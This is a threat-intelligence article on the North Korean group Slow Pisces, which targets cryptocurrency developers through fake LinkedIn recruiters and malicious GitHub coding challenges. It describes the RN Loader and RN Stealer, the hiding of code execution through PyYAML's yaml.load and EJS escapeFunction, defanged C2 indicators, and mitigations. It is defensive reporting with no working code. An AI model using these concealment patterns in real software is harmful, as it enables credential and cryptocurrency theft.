The North Korean state-sponsored threat group Slow Pisces has been conducting a sophisticated malware campaign targeting cryptocurrency developers through fake job opportunities on LinkedIn. According to recent research from Palo Alto Networks' Unit 42, the attackers use carefully crafted coding challenges to deliver custom malware, successfully stealing billions in cryptocurrency. This campaign, which began in 2024, represents an evolution in targeted social engineering attacks specifically designed to compromise valuable targets in the cryptocurrency sector.

Background on Slow Pisces

Slow Pisces, also tracked under multiple aliases including Jade Sleet, TraderTraitor, and PUKCHONG, is a North Korean state-sponsored threat actor primarily focused on generating revenue for the DPRK regime. The group specializes in targeting organizations in the cryptocurrency sector, employing various sophisticated techniques to compromise systems and steal digital assets.

The group has been remarkably successful in their criminal operations. According to security researchers, they reportedly stole over $1 billion USD from the cryptocurrency sector in 2023 alone. Their methods have evolved over time, including deploying fake trading applications, distributing malware through the Node Package Manager (NPM), and executing supply chain compromises.

In December 2024, the FBI attributed the theft of $308 million from a Japan-based cryptocurrency company called Bitcoin.DMM.Com to Slow Pisces. More recently, the group made headlines for its alleged involvement in an even larger heist — the theft of $1.5 billion from a Dubai-based cryptocurrency exchange. The Dubai victim was later identified as Bybit, with investigators confirming the attack was conducted by the TraderTraitor group (another name for Slow Pisces).

Recent Attack Attribution

The connection between Slow Pisces and high-profile cryptocurrency thefts continues to grow. In March 2025, Safe{Wallet} revealed that the cybersecurity incident leading to the Bybit $1.5 billion heist was a "highly sophisticated, state-sponsored attack" conducted by TraderTraitor. Security researchers indicated that the attackers took deliberate steps to erase traces of their malicious activity to hamper investigation efforts.

The LinkedIn Recruitment Campaign

The current campaign represents a sophisticated social engineering operation targeting a specific professional demographic. Palo Alto Networks Unit 42 discovered that Slow Pisces has been impersonating recruiters on LinkedIn since 2024, engaging with potential targets in the cryptocurrency development sector.

Multi-Stage Attack Process

The attack follows a carefully designed multi-stage process.

1. Initial contact through LinkedIn, posing as recruiters from cryptocurrency companies

2. Distribution of benign PDF job descriptions to targets who respond

3. Presentation of coding challenges that direct victims to malicious GitHub repositories

4. Execution of malicious code when victims attempt to complete the coding challenges

Sam Rubin, an executive at Palo Alto Networks, noted: "This campaign reveals real-world financial impacts of social engineering and supply chain compromises and should serve as a critical reminder that your company's threat surface now includes your employees' professional networks".

Strategic Targeting

Slow Pisces specifically targets individuals involved in cryptocurrency projects, presumably due to their potential access to valuable digital assets and infrastructure. The group has been observed impersonating several organizations within the cryptocurrency sector, creating a convincing facade of legitimacy.

Technical Analysis of the Attack Chain

Stage 1: PDF Lures

The initial stage begins when Slow Pisces threat actors, posing as recruiters, engage with potential targets on LinkedIn. They send seemingly benign PDF files containing job descriptions for positions in cryptocurrency development. If targets express interest in the position, the attackers follow up with a coding challenge document that outlines several tasks.

These challenge documents typically include generic software development tasks alongside a "real project" coding challenge. The document provides a link to a GitHub repository where the victim is instructed to download and execute code as part of the application process.

Stage 2: GitHub Repositories

The GitHub repositories created by Slow Pisces contain code adapted from legitimate open-source projects. These repositories host applications designed to view and analyze various types of data.

- Stock market data

- Statistics from European soccer leagues

- Weather data

- Cryptocurrency prices

The programming languages used in these repositories are strategically selected based on the target's background. Unit 42 researchers observed that "The group primarily used projects in either Python or JavaScript, likely depending on whether the target applied for a front-end or back-end development role". They also noted some Java-based repositories, though these were less common, with only two instances impersonating a cryptocurrency application called jCoin.

This pattern suggests that attackers might create repositories on demand based on a target's preferred programming language, focusing on languages popular in the cryptocurrency sector.

Stage 3: Malware Deployment

When victims run the code from the GitHub repository as instructed in the coding challenge, the malicious process is triggered. In Python-based attacks, researchers observed a project titled "Stocks Pattern Analyzer" that was adapted from a legitimate repository.

Python Repository Analysis

The malicious Python repositories typically fetch data from multiple sources, most of which are legitimate but one being malicious. For example, in one instance, data was fetched from:

- Two legitimate Wikipedia URLs

- One malicious domain controlled by Slow Pisces (en.stockslab[.]org)

The malicious command-and-control (C2) server is carefully designed to mimic legitimate sources, using similar subdomain structures (like .en) and TLDs (.org) to avoid raising suspicion.

Malware Capabilities and Evasion Techniques

Advanced Delivery Methods

Rather than placing malware directly in repositories or using easily detectable methods like Python's eval or exec functions, Slow Pisces employs sophisticated techniques to conceal their operations. The C2 server initially responds with valid application data (like S&P 500 company symbols in JSON format) and only delivers malicious payloads to validated targets based on specific criteria.

- IP address

- Geolocation

- Time

- HTTP request headers

This selective targeting approach allows the group to maintain tight control over who receives the malware, limiting exposure to their tools and techniques.

RN Loader and RN Stealer

Unit 42 researchers identified two previously unknown malware payloads used in this campaign.

1. RN Loader: This initial payload collects and exfiltrates basic information about the victim's machine and operating system via HTTPS to the attackers' C2 server.

2. RN Stealer: This more sophisticated infostealer is deployed selectively and can extract various types of sensitive data from compromised systems. When deployed on macOS systems, it can steal:

- Basic victim information (username, machine name, architecture)

- Lists of installed applications

- Directory listings and contents of the victim's home directory

- The login.keychain-db file containing saved credentials

- Stored SSH keys

- Configuration files for AWS, Kubernetes, and Google Cloud

Concealment Techniques

Slow Pisces employs two primary techniques to hide malicious code execution.

1. YAML Deserialization: In Python repositories, the attackers use the yaml.load() function from the PyYAML library instead of the safer yaml.safe_load() function. This allows them to execute arbitrary code when parsing data from their C2 server.

2. EJS escapeFunction: In JavaScript repositories, the group leverages the Embedded JavaScript (EJS) templating tool. By passing responses from the C2 server to the ejs.render() function with malicious code in the escapeFunction parameter, they can execute arbitrary JavaScript code.

These techniques make detection and analysis significantly more difficult, as they avoid common malware indicators and operate primarily in memory.

Similar North Korean Campaigns

The use of LinkedIn and GitHub as attack vectors is not unique to Slow Pisces. Multiple DPRK-affiliated groups have employed similar tactics, including groups known as Alluring Pisces and Contagious Interview.

Contagious Interview Campaign

In April 2025, security researchers uncovered another North Korean campaign called "Contagious Interview," linked to the Lazarus Group. This operation created three front companies — BlockNovas LLC, Angeloper Agency, and SoftGlide LLC — and used them to distribute three malware strains: BeaverTail, InvisibleFerret, and OtterCookie.

Like Slow Pisces, this group targeted crypto professionals through fake job offers, but used a different set of tools and techniques. Contagious Interview would conduct technical assessments or video interviews, during which malware was delivered under the guise of coding tasks or browser camera tests.

Broader North Korean Cyber Strategy

These campaigns appear to be part of a larger trend in North Korea's cyber strategy. Alongside malware attacks, the regime is also employing tactics like "Wagemole," where AI-generated fake IT workers infiltrate legitimate companies to steal data and divert salaries back to the DPRK.

Infrastructure Analysis

The Slow Pisces operation maintains an extensive network of command-and-control infrastructure. Researchers have identified numerous domains used in this campaign between February 2024 and February 2025. These domains often mimic legitimate services, using subdomains like .api or .cdn to appear trustworthy.

Some notable domains and their associated IP addresses

- getstockprice[.]com (70.34.245[.]118)

- cdn[.]clubinfo[.]io (5.206.227[.]51)

- en[.]stockslab[.]org (91.103.140[.]191)

- update[.]jquerycloud[.]io (192.236.199[.]57)

Mitigation Strategies

The most effective mitigation against these types of targeted social engineering campaigns remains strict segregation of corporate and personal devices. This helps prevent the compromise of corporate systems when personal devices are targeted.

1. Implementing robust security awareness training, especially for developers and cryptocurrency professionals

2. Exercising caution when receiving job offers through LinkedIn, particularly those requesting the execution of code

3. Running code from unknown sources in isolated, sandboxed environments

4. Using advanced endpoint protection capable of detecting memory-only payloads

5. Monitoring for unusual network connections, especially to newly registered domains

The Slow Pisces campaign represents a sophisticated evolution in targeted cyber attacks against cryptocurrency developers. By leveraging professional networking platforms like LinkedIn and using legitimate-appearing coding challenges, the North Korean threat actors have created an effective method for delivering custom malware to high-value targets.

The success of this campaign — evidenced by the billions stolen from cryptocurrency exchanges — shows the growing sophistication of state-sponsored threat actors and the increasing risks faced by individuals in the cryptocurrency sector.